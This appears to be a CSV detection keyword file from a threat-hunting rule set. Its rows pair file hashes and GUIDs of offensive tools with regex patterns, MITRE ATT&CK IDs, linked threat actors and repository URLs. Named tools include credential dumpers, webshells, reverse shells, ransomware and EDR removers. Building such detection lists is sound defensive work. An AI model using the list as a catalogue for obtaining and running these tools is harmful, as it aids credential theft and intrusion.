"*f392e058d65cc84f23773a88424d5a9e6a6987f790c52e0fb032e8538b5aec36*",".{0,1000}f392e058d65cc84f23773a88424d5a9e6a6987f790c52e0fb032e8538b5aec36.{0,1000}","offensive_tool_keyword","PewPewPew","host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server","T1059.001 - T1102 - T1056 - T1071 - T1086 - T1123","TA0011 - TA0010 - TA0005 - TA0002 - TA0009 - TA0006","N/A","N/A","Credential Access","https://github.com/PowerShellEmpire/PowerTools","1","0","#filehash","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","43897" "*f39405d1051750c03116c4e4894f67b95709e9143132392eddd3639a0882bda7*",".{0,1000}f39405d1051750c03116c4e4894f67b95709e9143132392eddd3639a0882bda7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - 
T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43898" "*f3a81e60a02caea629cba10af9f8bf769ca6d6e2d45d6228c30f3b544e1f7f09*",".{0,1000}f3a81e60a02caea629cba10af9f8bf769ca6d6e2d45d6228c30f3b544e1f7f09.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","43900" "*f3a97e2966c9b63bf0ce88346b568687f4253557841fd9c8acdee8ad25b27a97*",".{0,1000}f3a97e2966c9b63bf0ce88346b568687f4253557841fd9c8acdee8ad25b27a97.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43901" "*f3aacbbaacceb0bdcac49d9b5e1da52d6883b7d736ca68f0a98f5a1d4838b995*","f3aacbbaacceb0bdcac49d9b5e1da52d6883b7d736ca68f0a98f5a1d4838b995","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","43902" "*f3acbb6add19742a56784205264a699f6604e1e64b391b9bad26f4745d3d7ed1*",".{0,1000}f3acbb6add19742a56784205264a699f6604e1e64b391b9bad26f4745d3d7ed1.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","43903" 
"*f3ad17104571c366fc2d5f3cacefdfd3cbc3f47195773b652a8c2eadc41624ca*",".{0,1000}f3ad17104571c366fc2d5f3cacefdfd3cbc3f47195773b652a8c2eadc41624ca.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43904" "*f3b1c8cf0abdaad743182c96258f5e88a8522004724a781596e6663565e5c456*",".{0,1000}f3b1c8cf0abdaad743182c96258f5e88a8522004724a781596e6663565e5c456.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","43905" "*f3b1f6c6ca346acab1afd2dc61c43588f4c0914c1a6d1247db3a46bbd3421b38*",".{0,1000}f3b1f6c6ca346acab1afd2dc61c43588f4c0914c1a6d1247db3a46bbd3421b38.{0,1000}","offensive_tool_keyword","psobf","PowerShell Obfuscator","T1027 - T1059 - T1564","TA0005","N/A","N/A","Defense Evasion","https://github.com/TaurusOmar/psobf","1","0","#filehash","N/A","6","2","171","30","2024-06-07T02:50:43Z","2024-06-07T01:45:12Z","43906" "*f3b3b2a5c53aadbd83530a0bf182d75766ebe5f85b0cfde3194b617becb558f5*",".{0,1000}f3b3b2a5c53aadbd83530a0bf182d75766ebe5f85b0cfde3194b617becb558f5.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - 
TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","43907" "*f3b57e4b17458688b689824705327c1e854a796a4e027b6e34855627e79454c0*",".{0,1000}f3b57e4b17458688b689824705327c1e854a796a4e027b6e34855627e79454c0.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","#filehash","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","43908" "*f3b5e0f54f1da134c5d3c135f5be8ae7e85e499e8e73fabf87ffe010c23749ef*",".{0,1000}f3b5e0f54f1da134c5d3c135f5be8ae7e85e499e8e73fabf87ffe010c23749ef.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","#filehash","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","43909" "*f3ba88e3c7410a48b8a15edccc2ededc4468d3babf5b9c07c4166cf58606f7d2*",".{0,1000}f3ba88e3c7410a48b8a15edccc2ededc4468d3babf5b9c07c4166cf58606f7d2.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","#filehash","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","43910" "*f3bdfbd2b36064266a9d9e4452aba93cb97980c37dbe472e0b3b72e1485500ab*",".{0,1000}f3bdfbd2b36064266a9d9e4452aba93cb97980c37dbe472e0b3b72e1485500ab.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","43911" "*f3bfcbc52736f637b0bc239e31343cd8f33f6e51ea449799e69b4225df15e325*",".{0,1000}f3bfcbc52736f637b0bc239e31343cd8f33f6e51ea449799e69b4225df15e325.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","43912" "*F3C62326-E221-4481-AC57-EF7F76AAF27B*",".{0,1000}F3C62326\-E221\-4481\-AC57\-EF7F76AAF27B.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","#GUIDproject","N/A","10","10","136","37","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z","43915" "*f3c663ef1bce5e962682a498edaeee56b0a68bfd29e193a3e380f1a350b75349*",".{0,1000}f3c663ef1bce5e962682a498edaeee56b0a68bfd29e193a3e380f1a350b75349.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","43916" 
"*f3cb64050cf5adc95cb438a2484346f06b2beca9599d1c5717fd93af759aace9*",".{0,1000}f3cb64050cf5adc95cb438a2484346f06b2beca9599d1c5717fd93af759aace9.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","43917" "*f3e108c7993b8d46c832ac2499a97395cc18fc9c4c1656acc25c969c7090ffcd*",".{0,1000}f3e108c7993b8d46c832ac2499a97395cc18fc9c4c1656acc25c969c7090ffcd.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","#filehash","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","43920" "*f3e392c770e87e69c6af2d3e83bd4b6190e6e09ce4aa4a681316dbb11582e1b3*",".{0,1000}f3e392c770e87e69c6af2d3e83bd4b6190e6e09ce4aa4a681316dbb11582e1b3.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - 
T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43921" "*f3f0056b4e4777cf4f9a9e1111180dd2ce0111cb2e1a5b2c1a98197c4ed27035*",".{0,1000}f3f0056b4e4777cf4f9a9e1111180dd2ce0111cb2e1a5b2c1a98197c4ed27035.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","43923" "*f3f1e7ecb0fbc06203f6300861cca295e2de0a1a2f636e4d6dcc2ac651f40acf*",".{0,1000}f3f1e7ecb0fbc06203f6300861cca295e2de0a1a2f636e4d6dcc2ac651f40acf.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","43924" "*f3f65e89ca224b5217cf6869fb4cdb3744f7ac998ccc8aa234706aa88042770b*",".{0,1000}f3f65e89ca224b5217cf6869fb4cdb3744f7ac998ccc8aa234706aa88042770b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - 
TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","43927" "*f3fa1708ff76cf83f28c5967402f55c2e7b744275932f8e457ed4f53e213bd66*",".{0,1000}f3fa1708ff76cf83f28c5967402f55c2e7b744275932f8e457ed4f53e213bd66.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","43928" "*F3FEBDE7-FBC8-48EC-8F24-5F33B8ACFB2A*",".{0,1000}F3FEBDE7\-FBC8\-48EC\-8F24\-5F33B8ACFB2A.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage Windows network stack communication via Windows Filtering Platform. Management can include blocking or permitting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","#GUIDproject","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","43929" "*f401f7bdae8094f273ab86529a90d93a192fed69897b908d1f5cc94f625b6b88*",".{0,1000}f401f7bdae8094f273ab86529a90d93a192fed69897b908d1f5cc94f625b6b88.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43930" "*f4029b49066c2eaacff2b8ff2cc6b0c2869720666d21432eb080c489a261678c*",".{0,1000}f4029b49066c2eaacff2b8ff2cc6b0c2869720666d21432eb080c489a261678c.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","43932" "*f4081a8e30f75d46.js*",".{0,1000}f4081a8e30f75d46\.js.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","43934" "*f4108e2e049af683395a2cff2dd6ab62bfbbf06da9e5e82e64fc62525a8c56ee*",".{0,1000}f4108e2e049af683395a2cff2dd6ab62bfbbf06da9e5e82e64fc62525a8c56ee.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","43935" "*f41834034f704e3f0a17ed534124e31052ffd449de3be29d287faf4933ce7c1b*",".{0,1000}f41834034f704e3f0a17ed534124e31052ffd449de3be29d287faf4933ce7c1b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","43938" "*f41c644ef625686c3452ad0a39350301dbae543d3fa0f552c5a62248c99b1db0*",".{0,1000}f41c644ef625686c3452ad0a39350301dbae543d3fa0f552c5a62248c99b1db0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43939" "*f42046227f0809a1311ad6b7cd6a904b84343ef4ecb426598ce356199720594d*",".{0,1000}f42046227f0809a1311ad6b7cd6a904b84343ef4ecb426598ce356199720594d.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","43940" "*f4257657ae5bf141b31cd56db96ac003687be4eb404d1245e27256307e0b5d35*",".{0,1000}f4257657ae5bf141b31cd56db96ac003687be4eb404d1245e27256307e0b5d35.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","43941" "*f42662aa9fb2d7cb0c9a73d21efff24dbe1051497795776c9a37f47f978fc57f*",".{0,1000}f42662aa9fb2d7cb0c9a73d21efff24dbe1051497795776c9a37f47f978fc57f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","43942" "*f42adcec359a40b1ab437ac635977f99e81848c453abc16f0d015c3d62cff7f6*",".{0,1000}f42adcec359a40b1ab437ac635977f99e81848c453abc16f0d015c3d62cff7f6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","43943" 
"*f4309ce07f27a76e253734d7b4b99159aad92445dd653b5dd96e3e76c9905588*",".{0,1000}f4309ce07f27a76e253734d7b4b99159aad92445dd653b5dd96e3e76c9905588.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","43945" "*f43d2a38f8e8ec7033006cc51efd0e596801579838059178042db1bcb295d131*",".{0,1000}f43d2a38f8e8ec7033006cc51efd0e596801579838059178042db1bcb295d131.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","43948" "*f43e8c0cc98b12f28a0aa3548d67c78856c13292bfb06ecdfcbba5caefa9fef0*",".{0,1000}f43e8c0cc98b12f28a0aa3548d67c78856c13292bfb06ecdfcbba5caefa9fef0.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","#filehash","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","43949" "*f44025a2d9ed6c009219a7e8f00e28b00bb2494c4aafc7def798957073ffd1b7*",".{0,1000}f44025a2d9ed6c009219a7e8f00e28b00bb2494c4aafc7def798957073ffd1b7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous 
webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","43950" "*f44103b0e97b84c0381f234744a0a2aa2bf79cc884ee9526dbab8f9d674bc17b*",".{0,1000}f44103b0e97b84c0381f234744a0a2aa2bf79cc884ee9526dbab8f9d674bc17b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43951" "*f44118e8d6e227dea16f78d905178cf64ef019a5145aebc06d04d41ea5fc6482*",".{0,1000}f44118e8d6e227dea16f78d905178cf64ef019a5145aebc06d04d41ea5fc6482.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - 
LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","43952" "*f44b640e28904ebbaa8ec1b8f44f51b06c36433f8a1f448cc3364f8f2f0710eb*",".{0,1000}f44b640e28904ebbaa8ec1b8f44f51b06c36433f8a1f448cc3364f8f2f0710eb.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","43954" "*f44bdc821e6588197e6d1b868a60aa140f20971a6eaeeb9e2a52bdb4065b7fd7*",".{0,1000}f44bdc821e6588197e6d1b868a60aa140f20971a6eaeeb9e2a52bdb4065b7fd7.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","#filehash","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","43955" "*f44f9465e65c790de6dd15f47e19e9f555c0e9aefa0194127ebea6e89dabcf0d*",".{0,1000}f44f9465e65c790de6dd15f47e19e9f555c0e9aefa0194127ebea6e89dabcf0d.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","43956" 
